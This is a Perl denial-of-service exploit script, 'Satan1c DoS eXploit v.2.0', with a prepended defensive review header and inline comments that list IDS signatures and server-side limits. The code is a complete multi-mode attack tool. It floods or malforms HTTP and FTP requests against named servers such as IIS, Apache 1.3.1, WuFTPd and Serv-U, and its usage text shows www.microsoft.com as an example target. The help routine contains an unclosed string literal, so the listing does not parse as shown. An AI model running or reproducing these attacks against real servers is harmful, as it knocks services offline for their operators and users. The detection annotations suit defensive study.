#!/usr/bin/perl
# ---------------------------------------------------------------------------
# Review notes (defensive reading; code below is unchanged from the listing)
#
# What this is: a command-line tool that takes a numeric mode, a host and a
# port, opens a TCP connection and sends one malformed or oversized HTTP/FTP
# request chosen by the mode.  Its own banner calls it a DoS exploit for the
# server versions listed below.
#
# Fixed strings it puts on the wire, usable as log/IDS signatures:
#   - HTTP header  "User-Agent: Satan1c DoS eXploit v.1.0"
#   - HTTP header  "Host: www.dhgroup.org" (sent regardless of the real target)
#   - HTTP headers "Stupidheader<N>: " followed by 8000 'z' characters
#   - FTP login    USER anonymous / PASS Satan1c@DoS.exp
#   - Request paths "/blabla.htr" and "/_vti_bin/shtml.dll/_vti_rpc"
#
# Traffic shapes worth alerting on, independent of those strings: very long
# request lines, unbounded header count/size, a declared Content-Length that
# never arrives, and over-long or glob/dot-heavy FTP command arguments.
# Server-side caps on request line, header count and header size (in Apache
# httpd: LimitRequestLine, LimitRequestFields, LimitRequestFieldSize) and on
# FTP command length bound the patterns below; the named product versions are
# the ones the author lists as affected.
#
# Code quality: no `use strict` / `use warnings`; every variable is a package
# global shared between the dispatch code and the subs.
# ---------------------------------------------------------------------------
$param = $ARGV[0];
$host = $ARGV[1];
$port = $ARGV[2];
$user = "anonymous"; #username to login on ftp-servers
$pass = "Satan1c\@DoS.exp"; #password
#########################################
# Satan1c DoS eXploit v.2.0 #
# v1z1t www.dhgroup.org for more stuff #
#########################################
#Vulnerable servers: #
#########################################
#MyWebServer v.1.0.2 and lower #
#602Pro Lansuite 2000a 1.0.34 #
#IIS v.4-5 #
#Apache 1.3.1 and lower #
#FrontPage (/_vti_bin/shtml.dll) #
#OmniHTTPd v.2.09 #
#4D WebServer #
#Advanced WebServer Pro #
#602Pro Lansuite 2000a #
#Savant Web Server 3.1 #
#WuFTPd 2.6.1 #
#TransSoft Broker FTP Server 5.0 #
#TYPSoft FTP server #
#Microsoft FTP Server 4.0-5.1 #
#FTP Serv-U 2.5 #
#Broker FTP Server 5.9.5 #
#########################################
#Author: D4rkGr3y #
#########################################
use IO::Socket;

# "help" is handled before any validation; help() ends with exit.
if ($param eq "help") { help(); }
print "\n\n";
print " [DamageHackingGroup|www.dhgroup.org]\n";
print "#Satanic DoS eXploit v.2.0 by D4rkGr3y\n\n";

# Mode dispatch.  The range check is numeric (`<`) while each branch compares
# as a string (`eq`).  Modes 0, 5, 6, 8 and 9 only set the filler ($data) and
# repeat count ($num) and share tw(); mode 7 shares aw(); the rest have their
# own sub.  Mode 16 (oracle) is dispatched here but not listed by help().
if (defined $param && defined $host && defined $port && $param < 18) {
    if ($param eq "0") { $num = "1000"; $data = "a"; print "MyWebServer v.1.0.2 - Win9x/Me/XP/NT\n"; tw(); }
    if ($param eq "1") { apa(); }
    if ($param eq "2") { iis4(); }
    if ($param eq "3") { iis5(); }
    if ($param eq "4") { iisvsfp(); }
    if ($param eq "5") { $num = "4096"; $data = "a"; print "OmniHTTPd v.2.09 - Win9x/Me/XP/NT\n"; tw(); }
    if ($param eq "6") { $num = "5000"; $data = "a"; print "4D WebServer - Win9x/Me/XP/NT\n"; tw(); }
    if ($param eq "7") { $num = "100"; $data = "\n"; print "Advanced WebServer Pro - Win9x/Me/XP/NT\n"; aw(); }
    if ($param eq "8") { $num = "160"; $data = "%2e"; print "602Pro Lansuite 2000a - Win9x/Me/XP/NT\n"; tw(); }
    if ($param eq "9") { $num = "300"; $data = "a"; print "Savant Web Server 3.1\n"; tw(); }
    if ($param eq "10") { wuftpd(); }
    if ($param eq "11") { trans(); }
    if ($param eq "12") { typsoft(); }
    if ($param eq "13") { msftp(); }
    if ($param eq "14") { servu(); }
    if ($param eq "15") { broker(); }
    if ($param eq "16") { oracle(); }
} else {
    print "Error in Params.\n";
    die "Type: perl SDE2.pl help\n";
}

# tw: one HTTP/1.0 GET whose path is $data repeated $num times (both globals
# set by the caller).  On the wire this is a single over-long request line:
# 300 to 5000 'a' characters, or "%2e" repeated 160 times for mode 8.
# Detection/mitigation point: request-line length limit.
sub tw {
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ==> ";
    # $buffer is a package global and is appended to, not assigned.
    $buffer .= $data x $num;
    print $socket "GET /$buffer HTTP/1.0\r\n\r\n";
    print "Complete.\n";
    close($socket);
    return;
}

# aw: sends $data x $num as-is, with no HTTP request line or headers around
# it.  For mode 7 that is 100 bare newline characters.
sub aw {
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ==> ";
    $buffer .= $data x $num;
    print $socket "$buffer";
    print "Complete.\n";
    close($socket);
    return;
}

# iis4: POST to /blabla.htr announcing "Transfer-Encoding: chunked", then a
# 3075-character run of 'a' written directly after the header lines.
# Signature material: the .htr path, the fixed Host and User-Agent values.
sub iis4 {
    print "IIS v.4.0 - Windows NT4\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ==> ";
    $data = "a";
    $num = "3075";
    $buffer .= $data x $num;
    print $socket "POST /blabla.htr HTTP/1.0\n";
    print $socket "Host: www.dhgroup.org\n";
    print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n";
    print $socket "Connection: Keep-Alive\n";
    print $socket "Transfer-Encoding: chunked\n";
    print $socket "$buffer\r\n\r\n";
    print "Complete.\n";
    close($socket);
    return;
}

# iis5: writes 110 GET requests back-to-back on one keep-alive connection,
# each declaring "Content-Length: 5300000" while sending only a short line.
# Detection point: large declared Content-Length on GET, repeated on a single
# connection, with the fixed Host/User-Agent values.
sub iis5 {
    print "IIS v.5.0 - Windows 2000\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ==> ";
    for($n=0;$n < 110; $n++) {
        print $socket "GET /index.html HTTP/1.0\n";
        print $socket "Host: www.dhgroup.org\n";
        print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n";
        print $socket "Connection: Keep-Alive\n";
        print $socket "Content-Length: 5300000\n";
        print $socket "uhahahahahahahahahahahahahahaha\r\n\r\n";
    }
    print "Complete.\n";
    close($socket);
    return;
}

# apa: sends "GET / HTTP/1.0" and then an open-ended stream of request
# headers named Stupidheader1, Stupidheader2, ... each carrying 8000 'z'
# characters; a progress line is printed every 100 headers.  The loop
# condition is the bareword Socket_Handle and nothing in the body leaves the
# loop.  Uses the low-level socket()/connect()/send() calls with a bareword
# handle rather than IO::Socket::INET like the other subs.
# Detection/mitigation point: caps on header count and header field size.
sub apa {
    #Ripped from mimeflood.pl exploit. Author: L.Facq
    print "Apache 1.3.1 and lower - Linux\BSD\n";
    print "Connecting to '$host' ==> ";
    $proto = getprotobyname('tcp');
    # Return value of socket() is not checked; only connect() is.
    socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
    $sin = sockaddr_in($port,inet_aton($host));
    connect(Socket_Handle,$sin) or die "Couldn't connect.\n";
    print "Connected.\n";
    print "Attacking target ==> \n";
    send Socket_Handle,"GET / HTTP/1.0\n",0;
    $val= ('z'x8000)."\n";
    $n= 1;
    $|= 1;   # unbuffered STDOUT so the progress counter appears immediately
    while (Socket_Handle) {
        send Socket_Handle,"Stupidheader$n: ",0;
        send Socket_Handle,$val,0;
        $n++;
        if (!($n % 100)) { print "$n\n"; }
    }
    print "Complete.\n";
    send Socket_Handle,"\n",0;
    while () { print $_; }
}

# oracle: connects (the die message says the port must be 1521), sends a bare
# newline, then writes the same plain-text string three times with 2-second
# pauses.  The payload is not a framed protocol message of any kind.
sub oracle {
    print "Oracle 8.0\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect: port must be 1521\n";
    print "Connected.\n";
    print "Attacking target ==> ";
    sleep(2);
    print $socket "\n";
    for ($i=0; $i<3; $i++) {
        sleep(2);
        print $socket "Be carefull. U r under attack.";
    }
    print "Complete.\n";
    close($socket);
    return;
}

# iisvsfp: POST to the FrontPage endpoint /_vti_bin/shtml.dll/_vti_rpc with
# "Content-Length: 2000", a 4-second pause, then "method=" followed by 4150
# 'a' characters.  It then reconnects and sends a plain "GET / HTTP/1.1"
# line; the second connection attempt has no `or die`, so its result is
# used unchecked.
# Signature material: the _vti_rpc path with an over-long method= value.
sub iisvsfp {
    print "IIS v.4-5 vs FrontPage - Windows NT4\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    $data = "a";
    $num = "4150";
    $buffer .= $data x $num;
    print "Attacking target ==> ";
    print $socket "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1\n";
    print $socket "Host: www.dhgroup.org\n";
    print $socket "MIME-Version: 1.0\n";
    print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n";
    print $socket "Connection: Keep-Alive\n";
    print $socket "Content-Length: 2000\n";
    print $socket "Content-Type: application/text\n\n";
    sleep(4);
    print $socket "\n\n";
    print $socket "method=$buffer\r\n\r\n";
    close($socket);
    sleep(2);
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM);
    print $socket "GET / HTTP/1.1\n";
    print "Complete.\n";
    close($socket);
    return;
}

# FTP modes (wuftpd, trans, typsoft, msftp, servu, broker) share one shape:
# connect, write USER/PASS with the fixed credentials above, then write one
# command line.  None of them reads a server reply, and `if ($socket)` tests
# only that the handle object is true, so the else branch (which prints its
# message to the socket, not to STDOUT) is not reached after a successful
# connect.  For defenders the anonymous login with PASS "Satan1c@DoS.exp" is
# the common indicator across all six.

# wuftpd: after login sends the line "ls -{".
sub wuftpd {
    print "WuFTPd 2.6.1 - Linux/BSD\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        print $socket "ls -{\n";
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# trans: after login sends the line "cwd ....".
sub trans {
    print "TransSoft Broker FTP Server 5.0 - WinNT/2k/xp\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        print $socket "cwd ....\n";
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# typsoft: after login sends "RETR ../../" (a retrieve whose argument is a
# parent-directory path rather than a file name).
sub typsoft {
    print "TYPSoft FTP server\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        print $socket "RETR ../../\n";
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# msftp: after login sends "STAT *?" followed by 240 'a' characters.
# Note this sub and servu accumulate into $buf, the others into $buffer.
sub msftp {
    print "Microsoft FTP Server 4.0-5.1\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        $data = "a";
        $num = "240";
        $buf .= $data x $num;
        print $socket "STAT *?$buf\n";
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# servu: after login sends "RETR " followed by the string "x00" repeated
# 1000 times (3000 characters as written in this listing).
sub servu {
    print "Serv-U FTP Server 2.5\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        $data = "x00";
        $num = "1000";
        $buf .= $data x $num;
        print $socket "RETR $buf\n";
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# broker: after login sends the line "cwd ...." thirty times on the same
# control connection.
sub broker {
    print "Broker FTP Server 5.9.5\n";
    print "Connecting to '$host' ==> ";
    $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
    print "Connected.\n";
    print $socket "USER $user\n";
    print $socket "PASS $pass\n";
    if ($socket) {
        for ($i=0; $i<30; $i++) {
            print $socket "cwd ....\n";
        }
        print "Attacking complete.\n";
    } else {
        print $socket "Error: can't logged in.\n";
    }
}

# help: prints the usage text and the mode table (0-9 HTTP, 10-15 FTP), then
# exits.  Mode 16 is not listed.
# NOTE(review): as captured on this page the first string literal below is
# not closed before the next print statement, so the listing does not parse
# as shown.
sub help {
    print "Satan1c DoS eXploit v.2.0 by D4rkGr3y print "Usage: perl Satan1c.DoS.eXp.pl [sys_type] [host] [port]\n";
    print "Where 'sys_type' - type of remote server (daemon):\n";
    print "HTTP servers:\n";
    print "0 - MyWebServer v.1.0.2\n";
    print "1 - Apache 1.3.1 and lower\n";
    print "2 - IIS 4.0\n";
    print "3 - IIS 5.0\n";
    print "4 - IIS4-5 vs FPage Extension (/_vti_bin/shtml.dll)\n";
    print "5 - OmniHTTPd v.2.09\n";
    print "6 - 4D WebServer\n";
    print "7 - Advanced WebServer Pro\n";
    print "8 - 602Pro Lansuite 2000a\n";
    print "9 - Savant Web Server 3.1\n";
    print "FTP servers:\n";
    print "10 - WuFTPd 2.6.1\n";
    print "11 - TransSoft Broker FTP Server 5.0\n";
    print "12 - TYPSoft FTP server\n";
    print "13 - Microsoft FTP Server 4.0-5.1\n";
    print "14 - FTP Serv-U 2.5\n";
    print "15 - Broker FTP Server 5.9.5\n";
    print "Example: perl SDE2.pl 3 www.microsoft.com 80 \n";
    exit;
}